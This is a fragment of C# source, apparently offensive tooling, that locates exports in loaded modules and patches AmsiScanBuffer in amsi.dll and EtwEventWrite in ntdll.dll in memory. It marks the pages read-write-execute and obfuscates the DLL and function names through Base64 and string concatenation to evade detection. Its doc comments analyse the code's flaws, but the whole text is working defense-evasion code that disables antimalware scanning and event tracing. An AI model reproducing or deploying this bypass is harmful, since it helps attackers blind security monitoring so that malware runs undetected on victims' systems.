            Int32 NamesRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x20));
            Int32 OrdinalsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x24));

            // Loop the array of export name RVA's
            for (int i = 0; i < NumberOfNames; i++)
            {
                string FunctionName = Marshal.PtrToStringAnsi((IntPtr)(ModuleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + NamesRVA + i * 4))));
                if (FunctionName.Equals(ExportName, StringComparison.OrdinalIgnoreCase))
                {
                    // OrdinalBase cancels out between these two lines; forwarded exports are not detected.
                    Int32 FunctionOrdinal = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + OrdinalsRVA + i * 2)) + OrdinalBase;
                    Int32 FunctionRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + FunctionsRVA + (4 * (FunctionOrdinal - OrdinalBase))));
                    FunctionPtr = (IntPtr)((Int64)ModuleBase + FunctionRVA);
                    break;
                }
            }
        }
        catch
        {
            // Catch parser failure (original exception is discarded)
            throw new InvalidOperationException("Failed to parse module exports.");
        }

        if (FunctionPtr == IntPtr.Zero)
        {
            // Export not found
            throw new MissingMethodException(ExportName + " not found.");
        }
        return FunctionPtr;
    }

    /// <summary>
    /// Base64-decodes <paramref name="b64encoded"/> and returns it as an ASCII string. Used to
    /// keep the module name out of the binary's plain-text strings.
    /// </summary>
    /// <param name="b64encoded">Base64 text.</param>
    /// <returns>Decoded ASCII string.</returns>
    /// <exception cref="FormatException">Input is not valid Base64.</exception>
    private static string decode(string b64encoded)
    {
        return System.Text.ASCIIEncoding.ASCII.GetString(System.Convert.FromBase64String(b64encoded));
    }

    /// <summary>
    /// Overwrites the start of <paramref name="function"/> in the loaded module
    /// <paramref name="library"/> with <paramref name="patch"/>, after making the page RWX via
    /// <see cref="DInvokeCore.NtProtectVirtualMemory"/>.
    /// </summary>
    /// <param name="patch">Bytes to write.</param>
    /// <param name="library">Module file name (compared against Path.GetFileName of each module, ordinal-ignore-case).</param>
    /// <param name="function">Export name to patch.</param>
    /// <remarks>
    /// Failure handling as written: if the module is not loaded, FirstOrDefault() returns null and
    /// the .BaseAddress access throws NullReferenceException; that and every other error is caught
    /// and printed to Console (which a WinForms app likely does not have attached), so callers get no
    /// indication. The return value of NtProtectVirtualMemory is ignored, so Marshal.Copy runs even
    /// when the protection change failed. The old protection is never restored.
    /// </remarks>
    private static void PatchMem(byte[] patch, string library, string function)
    {
        try
        {
            IntPtr CurrentProcessHandle = new IntPtr(-1); // pseudo-handle for current process handle
            IntPtr libPtr = (Process.GetCurrentProcess().Modules.Cast<ProcessModule>().Where(x => library.Equals(Path.GetFileName(x.FileName), StringComparison.OrdinalIgnoreCase)).FirstOrDefault().BaseAddress);
            IntPtr funcPtr = GetExportAddress(libPtr, function);
            IntPtr patchLength = new IntPtr(patch.Length);
            UInt32 oldProtect = 0;
            // 0x40 = PAGE_EXECUTE_READWRITE. funcPtr/patchLength are not updated by the wrapper (see its docs).
            DInvokeCore.NtProtectVirtualMemory(CurrentProcessHandle, ref funcPtr, ref patchLength, 0x40, ref oldProtect);
            Marshal.Copy(patch, 0, funcPtr, patch.Length);
        }
        catch (Exception e)
        {
            Console.WriteLine(" [!] {0}", e.Message);
            Console.WriteLine(" [!] {0}", e.InnerException);
        }
    }

    /// <summary>
    /// Patches AmsiScanBuffer in amsi.dll, but only if amsi.dll is already loaded in this process
    /// ("YW1zaS5kbGw=" decodes to "amsi.dll"; the concatenation below spells "AmsiScanBuffer").
    /// </summary>
    /// <param name="patch">Architecture-specific stub bytes.</param>
    private static void Patcham_si(byte[] patch)
    {
        string dll = decode("YW1zaS5kbGw=");
        // Process object not disposed. Note the module-name comparison here is case-sensitive,
        // unlike the lookup inside PatchMem.
        foreach (ProcessModule CurrentModule in (Process.GetCurrentProcess().Modules))
        {
            if (CurrentModule.ModuleName == dll)
            {
                PatchMem(patch, dll, ("Am" + "si" + "Sc" + "an" + "Bu" + "ff" + "er"));
            }
        }
    }

    /// <summary>
    /// Patches EtwEventWrite in ntdll.dll (the concatenations spell "ntdll.dll" and
    /// "EtwEventWrite"). ntdll is always loaded, so unlike Patcham_si there is no presence check.
    /// </summary>
    /// <param name="Patch">Architecture-specific stub bytes.</param>
    private static void PatchETW(byte[] Patch)
    {
        PatchMem(Patch, ("n" + "t" + "d" + "l" + "l" + "." + "d" + "l" + "l"), ("Et" + "wE" + "ve" + "nt" + "Wr" + "it" + "e"));
    }

    /// <summary>
    /// Entry point called from Program.Main: selects the x64 or x86 stubs from the process
    /// pointer size and applies the AMSI patch followed by the ETW patch. Errors are swallowed
    /// inside PatchMem, so this always returns normally.
    /// </summary>
    public static void B()
    {
        bool isit64bit;
        // IntPtr.Size is 4 in a 32-bit process, 8 in a 64-bit one.
        if (IntPtr.Size == 4)
        {
            isit64bit = false;
        }
        else
        {
            isit64bit = true;
        }
        if (isit64bit)
        {
            Patcham_si(x64_am_si_patch);
            PatchETW(x64_etw_patch);
        }
        else
        {
            Patcham_si(x86_am_si_patch);
            PatchETW(x86_etw_patch);
        }
    }
}
}